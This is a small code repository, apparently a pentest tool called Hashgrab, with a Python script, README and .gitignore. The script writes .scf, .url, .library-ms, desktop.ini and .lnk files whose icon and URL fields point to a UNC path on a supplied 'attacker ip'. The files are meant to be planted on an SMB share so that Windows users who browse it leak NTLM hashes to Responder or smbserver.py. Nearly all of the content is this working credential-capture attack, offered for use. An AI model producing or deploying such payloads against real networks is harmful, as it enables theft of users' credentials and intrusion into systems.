├── requirements.txt
├── README.md
├── .gitignore
└── hashgrab.py


/requirements.txt:
--------------------------------------------------------------------------------
1 | pylnk3
2 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Hashgrab
2 | 
3 | Generates scf, url & lnk payloads to put onto a smb share. These force authentication to an attacker machine in order to grab hashes (for example with responder).
4 | 
5 | Usage:
6 | 
7 | ```bash
8 | python3 hashgrab.py <ip> <output>
9 | ```


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | .eggs/
 17 | lib/
 18 | lib64/
 19 | parts/
 20 | sdist/
 21 | var/
 22 | wheels/
 23 | share/python-wheels/
 24 | *.egg-info/
 25 | .installed.cfg
 26 | *.egg
 27 | MANIFEST
 28 | 
 29 | # PyInstaller
 30 | #  Usually these files are written by a python script from a template
 31 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 32 | *.manifest
 33 | *.spec
 34 | 
 35 | # Installer logs
 36 | pip-log.txt
 37 | pip-delete-this-directory.txt
 38 | 
 39 | # Unit test / coverage reports
 40 | htmlcov/
 41 | .tox/
 42 | .nox/
 43 | .coverage
 44 | .coverage.*
 45 | .cache
 46 | nosetests.xml
 47 | coverage.xml
 48 | *.cover
 49 | *.py,cover
 50 | .hypothesis/
 51 | .pytest_cache/
 52 | cover/
 53 | 
 54 | # Translations
 55 | *.mo
 56 | *.pot
 57 | 
 58 | # Django stuff:
 59 | *.log
 60 | local_settings.py
 61 | db.sqlite3
 62 | db.sqlite3-journal
 63 | 
 64 | # Flask stuff:
 65 | instance/
 66 | .webassets-cache
 67 | 
 68 | # Scrapy stuff:
 69 | .scrapy
 70 | 
 71 | # Sphinx documentation
 72 | docs/_build/
 73 | 
 74 | # PyBuilder
 75 | .pybuilder/
 76 | target/
 77 | 
 78 | # Jupyter Notebook
 79 | .ipynb_checkpoints
 80 | 
 81 | # IPython
 82 | profile_default/
 83 | ipython_config.py
 84 | 
 85 | # pyenv
 86 | #   For a library or package, you might want to ignore these files since the code is
 87 | #   intended to run in multiple environments; otherwise, check them in:
 88 | # .python-version
 89 | 
 90 | # pipenv
 91 | #   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
 92 | #   However, in case of collaboration, if having platform-specific dependencies or dependencies
 93 | #   having no cross-platform support, pipenv may install dependencies that don't work, or not
 94 | #   install all needed dependencies.
 95 | #Pipfile.lock
 96 | 
 97 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow
 98 | __pypackages__/
 99 | 
100 | # Celery stuff
101 | celerybeat-schedule
102 | celerybeat.pid
103 | 
104 | # SageMath parsed files
105 | *.sage.py
106 | 
107 | # Environments
108 | .env
109 | .venv
110 | env/
111 | venv/
112 | ENV/
113 | env.bak/
114 | venv.bak/
115 | 
116 | # Spyder project settings
117 | .spyderproject
118 | .spyproject
119 | 
120 | # Rope project settings
121 | .ropeproject
122 | 
123 | # mkdocs documentation
124 | /site
125 | 
126 | # mypy
127 | .mypy_cache/
128 | .dmypy.json
129 | dmypy.json
130 | 
131 | # Pyre type checker
132 | .pyre/
133 | 
134 | # pytype static type analyzer
135 | .pytype/
136 | 
137 | # Cython debug symbols
138 | cython_debug/
139 | 
140 | *.lnk
141 | *.scf
142 | *.url


--------------------------------------------------------------------------------
/hashgrab.py:
--------------------------------------------------------------------------------
  1 | import argparse
  2 | import random
  3 | import os
  4 | from time import sleep
  5 | from pylnk3 import Lnk
  6 | 
  7 | scf = '''
  8 | [Shell]
  9 | Command=2
 10 | IconFile=\\\\{}\\x\\{}.ico
 11 | [Taskbar]
 12 | Command=ToggleDesktop
 13 | '''
 14 | 
 15 | url = '''
 16 | [InternetShortcut]
 17 | URL=http://{}/x/{}.html
 18 | IconIndex=1
 19 | IconFile=\\\\{}\\x\\{}.ico
 20 | '''
 21 | 
 22 | lib = '''
 23 | <?xml version="1.0" encoding="UTF-8"?>
 24 | <libraryDescription xmlns="<http://schemas.microsoft.com/windows/2009/library>">
 25 |   <name>@windows.storage.dll,-34582</name>
 26 |   <version>6</version>
 27 |   <isLibraryPinned>true</isLibraryPinned>
 28 |   <iconReference>imageres.dll,-1003</iconReference>
 29 |   <templateInfo>
 30 |     <folderType><§7d49d726-3c21-4f05-99aa-fdc2c9474656§></folderType>
 31 |   </templateInfo>
 32 |   <searchConnectorDescriptionList>
 33 |     <searchConnectorDescription>
 34 |       <isDefaultSaveLocation>true</isDefaultSaveLocation>
 35 |       <isSupported>false</isSupported>
 36 |       <simpleLocation>
 37 |         <url>\\\\{}\\x\\{}</url>
 38 |       </simpleLocation>
 39 |     </searchConnectorDescription>
 40 |   </searchConnectorDescriptionList>
 41 | </libraryDescription>
 42 | '''
 43 | 
 44 | ini = '''
 45 | [.ShellClassInfo]
 46 | IconResource=\\\\{}\\x\\{}
 47 | IconIndex={}
 48 | '''
 49 | 
 50 | 
 51 | def generate(ip, out):
 52 |     print("[*] Generating hash grabbing files..")
 53 |     # scf
 54 |     scf_payload = scf.format(ip, f"scf_{random.randint(0, 1000)}")
 55 |     fname = f'@{out}.scf'
 56 |     with open(fname, 'w+') as f:
 57 |         f.write(scf_payload)
 58 |         print(f"[*] Written {fname}")
 59 |     
 60 |     # url
 61 |     url_payload = url.format(ip, f"url_{random.randint(0, 1000)}", ip, f"url_{random.randint(0, 1000)}")
 62 |     fname = f'@{out}.url'
 63 |     with open(fname, 'w+') as f:
 64 |         f.write(url_payload)
 65 |         print(f"[*] Written {fname}")
 66 | 
 67 |     # library-ms
 68 |     lib_payload = lib.format(ip, f"library-ms_{random.randint(0, 1000)}", ip, f"library-ms_{random.randint(0, 1000)}")
 69 |     lib_payload = lib_payload.replace("<§","{").replace("§>","}")
 70 |     fname = f'{out}.library-ms'
 71 |     with open(fname, 'w+') as f:
 72 |         f.write(lib_payload)
 73 |         print(f"[*] Written {fname}")
 74 | 
 75 |     # ini
 76 |     ini_payload = ini.format(ip, f"ini_{random.randint(0, 1000)}", ip, f"ini_{random.randint(0, 1000)}", f"{random.randint(0, 1000)}")
 77 |     fname = f'desktop.ini'
 78 |     with open(fname, 'w+') as f:
 79 |         f.write(ini_payload)
 80 |         print(f"[*] Written {fname}")
 81 | 
 82 |     # lnk
 83 |     skeleton_path = f"{os.path.dirname(os.path.abspath(__file__))}/skel"
 84 |     fname =f"lnk_{random.randint(0, 1000)}.ico"
 85 |     path = f"pylnk3 c \\\\\\\\{ip}\\\\x\\\\{fname} {skeleton_path}.lnk"
 86 |     os.system(path)
 87 |     sleep(1)
 88 |     lnk = Lnk(skeleton_path)
 89 |     lnk.icon = f'\\\\{ip}\\x\\{fname}'
 90 |     lnk.save(f'{out}.lnk')
 91 |     print(f"[*] Written {fname}")
 92 |     print("[+] Done, upload files to smb share and capture hashes with smbserver.py/responder")
 93 | 
 94 | 
 95 | if __name__ == "__main__":
 96 |     parser = argparse.ArgumentParser(description='create hash grabbing payloads')
 97 |     parser.add_argument('ip',  type=str, help='attacker ip')
 98 |     parser.add_argument('out',  type=str, help='output name')
 99 |     args = parser.parse_args()
100 |     generate(args.ip, args.out)
101 | 


--------------------------------------------------------------------------------